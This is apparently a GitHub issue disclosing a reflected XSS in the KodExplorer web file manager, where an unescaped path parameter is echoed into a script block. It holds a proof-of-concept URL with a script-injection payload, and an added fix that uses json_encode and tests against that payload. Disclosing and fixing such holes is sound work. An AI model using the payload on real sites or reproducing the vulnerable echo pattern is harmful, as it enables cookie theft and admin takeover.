kalcaddle / KodExplorer

A web based file manager, web IDE / browser based code editor
https://kodcloud.com

New Reflected XSS in KodExplorer #482

Closed Eric1253 closed 3 years ago

Eric1253 commented 3 years ago

Analyse

file: app/template/api/view.html

G.shareInfo = {
    path:"<?php echo $_GET['path'];?>",
    name:"<?php echo get_path_this($_GET['path']);?>",
    mtime:0,
    size:0
}

There is no safety check on the variable (path); it is echoed directly into the page. An attacker can use this bug to send a phishing email to the administrator and capture the admin's cookie, and so take control of the website.

PoC

http://example.com/index.php?explorer/fileView&path=</script><script>alert(1234)</script>

Screenshots

Local Website Test:


kalcaddle commented 3 years ago

Thanks for your work. We will fix it soon.
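
One way to close the hole described in this issue, as an added example rather than KodExplorer's actual patch: build the object in PHP and emit it with json_encode() and the JSON_HEX_* flags instead of echoing `$_GET['path']` into a JavaScript string. `path_last_component()` is a hypothetical stand-in for the project's `get_path_this()` (assumed to return the last path component), and the sample inputs are constructed; the second is the path value from the PoC above.

```php
<?php
// Added example, not code from the KodExplorer repository.

// Hypothetical stand-in for get_path_this(); assumed behaviour:
// return the last component of the path.
function path_last_component(string $path): string {
    $trimmed = rtrim(str_replace('\\', '/', $path), '/');
    $pos = strrpos($trimmed, '/');
    return $pos === false ? $trimmed : substr($trimmed, $pos + 1);
}

// With these flags json_encode() emits <, >, &, ' and " inside strings
// as \u00XX escapes, so a value can close neither the string literal
// nor the surrounding <script> element.
const JS_SAFE = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;

function render_share_info(string $path): string {
    $info = [
        'path'  => $path,
        'name'  => path_last_component($path),
        'mtime' => 0,
        'size'  => 0,
    ];
    $json = json_encode($info, JS_SAFE);
    if ($json === false) {
        // e.g. invalid UTF-8: emit an empty record, never the raw input.
        $json = '{"path":"","name":"","mtime":0,"size":0}';
    }
    return 'G.shareInfo = ' . $json . ';';
}

// Constructed inputs: a normal path, the PoC value, a quote break-out.
$samples = [
    '/docs/readme.txt',
    '</script><script>alert(1234)</script>',
    'a";alert(1)//',
];
foreach ($samples as $s) {
    $out = render_share_info($s);
    // No angle bracket from the input may survive in the output.
    if (strpbrk($out, '<>') !== false) {
        throw new RuntimeException('unescaped markup in: ' . $out);
    }
    echo $out, PHP_EOL;
}
```

In the template, the whole `G.shareInfo = {...}` literal would then be replaced by a single `<?php echo render_share_info($_GET['path']);?>`, so no request value is ever concatenated into script text by hand.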